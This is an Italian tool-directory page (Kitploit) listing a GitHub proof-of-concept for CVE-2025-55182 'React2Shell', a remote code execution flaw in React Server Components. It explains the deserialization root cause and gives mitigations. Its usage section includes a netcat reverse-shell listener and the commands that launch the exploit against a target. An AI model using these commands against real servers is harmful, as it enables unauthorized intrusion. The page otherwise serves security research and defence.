Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-React2Shell-RCE — Exploit proof-of-concept per CVE-2025-55182 (React2Shell), una vulnerabilità di esecuzione remota di codice non autenticata nei React Server Components tramite payload del protocollo Flight appositamente modificati. | Kitploit
Strumenti/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

Exploit proof-of-concept per CVE-2025-55182 (React2Shell), una vulnerabilità di esecuzione remota di codice non autenticata nei React Server Components tramite payload del protocollo Flight appositamente modificati.

Vedi Repository
1103 mesi faNon ancora revisionato
Condividi

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (RCE non autenticata nei React Server Components)

CVE-2025-55182, nota anche come React2Shell, è una critica vulnerabilità di Remote Code Execution (RCE) non autenticata che interessa i pacchetti React Server Components (versioni 19.0, 19.1.0, 19.1.1 e 19.2.0).

Questa vulnerabilità può consentire agli aggressori di ottenere esecuzione arbitraria di codice sui server vulnerabili tramite una singola richiesta HTTP appositamente predisposta, senza richiedere autenticazione.


Panoramica

I React Server Components utilizzano il protocollo Flight per serializzare e deserializzare i dati dei componenti scambiati tra client e server.

Una validazione insufficiente durante questo processo di deserializzazione può consentire a payload appositamente creati di manipolare le strutture interne degli oggetti e raggiungere primitive di esecuzione JavaScript pericolose.


Causa principale

La vulnerabilità deriva da una validazione insufficiente durante la deserializzazione dei payload del protocollo Flight dei React Server Components (RSC).

I payload appositamente predisposti possono:

  • manipolare le strutture interne degli oggetti
  • percorrere la catena dei prototipi JavaScript
  • accedere a costruttori JavaScript pericolosi
  • ottenere esecuzione arbitraria di codice sul server

Come funziona

  1. L'exploit invia una richiesta multipart/form-data appositamente predisposta
  2. Il server interpreta la richiesta come un payload React Flight
  3. Il frammento malevolo viene elaborato durante la deserializzazione
  4. Il payload:
  • manipola il flusso di esecuzione interno
  • raggiunge primitive di esecuzione JavaScript pericolose
  • esegue codice arbitrario
  1. L'aggressore ottiene l'esecuzione remota di codice sul server di destinazione

🚀 Utilizzo

Avvia un listener sulla tua macchina:

nc -lvnp 4444

Esegui l'exploit:

python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

Requisiti

  • Versioni vulnerabili di React / Next.js
  • React Server Components abilitati lato server
  • Endpoint RSC raggiungibile

Mitigazione

Per mitigare questa vulnerabilità:

  • Aggiorna React all'ultima patch disponibile
  • Applica le patch del framework disponibili
  • Monitora e blocca richieste RSC sospette

Riferimenti

  • OffSec – Analisi dello sfruttamento di CVE-2025-55182

  • Microsoft Security – Difendersi da React2Shell

  • Avviso di sicurezza React (Divulgazione ufficiale)


Disclaimer

Questo progetto è fornito esclusivamente per:

  • Ricerca sulla sicurezza
  • Scopi educativi
  • Valutazioni di sicurezza autorizzate e penetration test

Gli autori non si assumono alcuna responsabilità per un uso improprio o danni causati da questo materiale. Gli utenti sono gli unici responsabili del rispetto di tutte le leggi e normative applicabili.

Scarica lo strumento